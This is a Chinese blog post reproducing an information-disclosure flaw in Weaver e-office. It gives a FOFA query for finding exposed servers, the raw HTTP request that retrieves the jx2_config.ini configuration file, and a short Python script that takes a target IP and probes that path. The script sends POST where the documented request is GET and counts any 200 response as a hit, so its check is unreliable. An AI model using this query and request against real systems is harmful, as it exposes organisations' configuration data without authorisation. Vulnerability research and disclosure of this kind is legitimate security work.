泛微e-office系统敏感信息泄露漏洞

已于 2024-02-24 14:48:59 修改
阅读量326 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 漏洞复现 python 泛微OA
于 2024-02-24 09:13:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/136263796
版权

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

1、系统简介

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

2、漏洞描述

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,该系统存在敏感信息泄露漏洞。

3、fofa查询语句

app="泛微-EOffice"

4、漏洞复现

漏洞链接: http://xxxxxxxx/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 
Connection: close

5、python检测脚本

import requests

def verify(ip):
    url = f'{ip}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini'

    headers = {
        'User-Agent': ' Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
        'Connection': 'close'
    }

    try:
        response = requests.post(url, headers=headers)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在泛微e-office系统敏感信息泄露漏洞!!!")
    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

6、修复意见

请关注官网更新补丁: https://www.e-office.cn/ 

故事讲予风听
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
泛微e-office_V10.0 短信插件.zip
11-17
泛微e-office_V10.0 短信插件.zip
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁************* 1. 请务必在大家不使用的情况下执行升级,避免正在使用者的数据丢失。 2. 登录未升级的系统,单击窗口右上角【版本信息】查看必须是【10.0_20180119】及以上版本:
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,需要升级的客户请联系相应区域客服。 2.确保升级系统的版本为:官方发布的10.0最新补丁版本 3.升级前,确保仔细阅读“升级必读文档”,并且,备份数据和程序文件。 升级过程 1、通过服务器管理平台,点击:“全部卸载”即卸载所有服务 2、退出服务器管理平台。右击工具栏上的“服务器图标”,点击退出。 3、将eoffice10目录修改为eoffice目录 4、解压11.0标准补丁,将bin和www覆盖OA相应目录。 5、bin目录下双击”ServerManagement.exe”,注册所有服务 6、bin目录下双击“update.bat”文件。升完成后小窗口后自动关闭,登录OA系统,右上角OA版本号为11.0_20221122 升级后 1、需要重新进行授权 2、若升级过程中出现任何异常,请及时联系相应区域客服
泛微E-Office敏感信息泄露和未授权访问漏洞
08-03 1394
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微e-office系统存在敏感信息泄露 附POC软件
nnn2188185的博客
02-21 127
泛微e-office系统存在敏感信息泄露
漏洞复现泛微E-Office信息泄露漏洞(CVE-2023-2766)
失心少年
11-21 534
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Weaver E-Office 9.5版本存在安全漏洞。Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。Weaver E-Office 9.5版本。
泛微E-Office10 远程代码执行漏洞复现(QVD-2024-11354)
0xSec
04-04 1277
2024年3月,互联网上披露泛微E-Office10存在远程代码执行漏洞,攻击者可利用该漏洞获取服务器控制权限。该漏洞利用简单,无需前置条件,漏洞的关键在于系统处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
泛微E-Office10远程代码执行漏洞
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微E-Office信息泄露漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-11 426
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。Weaver E-Office 9.5版本存在安全漏洞。攻击者利用该漏洞可以访问文件或目录。漏洞编号:CVE-2023-2766没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现--泛微E-Office信息泄露(CVE-2023-2766)
qq_53003652的博客
11-09 518
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品configfile。目前厂商已发布升级补丁以修复漏洞
CVE-2023-2766:泛微E-Office信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-14 1546
Weaver E-Office 9.5版本存在configfile存在信息泄露。攻击者利用该漏洞可以访问文件或目录。
CNVD-2021-49104——泛微E-Office文件上传漏洞
m0_58596609的博客
12-14 1287
CNVD-2021-49104——泛微E-Office文件上传漏洞
漏洞复现泛微E-Office jx2_config 存在信息泄露漏洞
qq_34780861的博客
04-18 290
泛微E-Office泛微旗下的一款标准协同移动办公平台。泛微E-Office jx2_config 存在信息泄露漏洞
【 书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
05-03 1548
本篇笔记内容主要为 【书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建智能体的作业 ,主要对智能体应用理论部分及具体搭建流程详细介绍,并分别进行实战应用及可视化展示,欢迎大家交流学习!
Python从0到POC编写--实用小脚本
最新发布
余十步的博客
05-09 920
模块中定义了一些常用的属性(包含所有数字,字母,可打印的所有ascii码等)第二步就是要把这些没有写的协议,或者没有补全的协议全部替换为我们的内容,在ctf比赛中,为了能够快速获取flag,获得更多的分数,现在呢,代码是这样子的,需要把一些标签替换为空,把。这份列表呢,奇奇怪怪,有些写错了,有些没补全。不管用户输入的是什么,都替换为我们安排的内容,现在呢,我们有了一份奇怪的列表要去判断,我们只知道前三位,然后需要去爆破后两位,当然,比赛一般有两种获取flag的方式,在解题的过程中,只能看到一半的密码,
泛微e-office10本地升级
01-30
泛微e-office10是一款优秀的办公自动化软件,其本地升级操作非常简单。首先,我们需要下载最新的e-office10升级包,通常可以在官方网站或相关论坛获取。接着,我们需要备份好原有的e-office10数据,以防止升级过程中出现意外情况导致数据丢失。然后,我们运行升级包,按照界面提示进行操作,通常只需要点击几次“下一步”即可完成升级过程。等待片刻后,系统会自动完成升级,并提示我们重新启动e-office10软件。最后,我们可以打开软件,确认升级是否成功,通常会显示软件版本号已经更新。需要注意的是,在升级过程中,一定要保持电脑网络连接稳定,防止升级失败。总的来说,泛微e-office10的本地升级非常方便快捷,只需要简单的几个步骤就能完成,而且升级后的新版本通常会带来更好的功能和性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值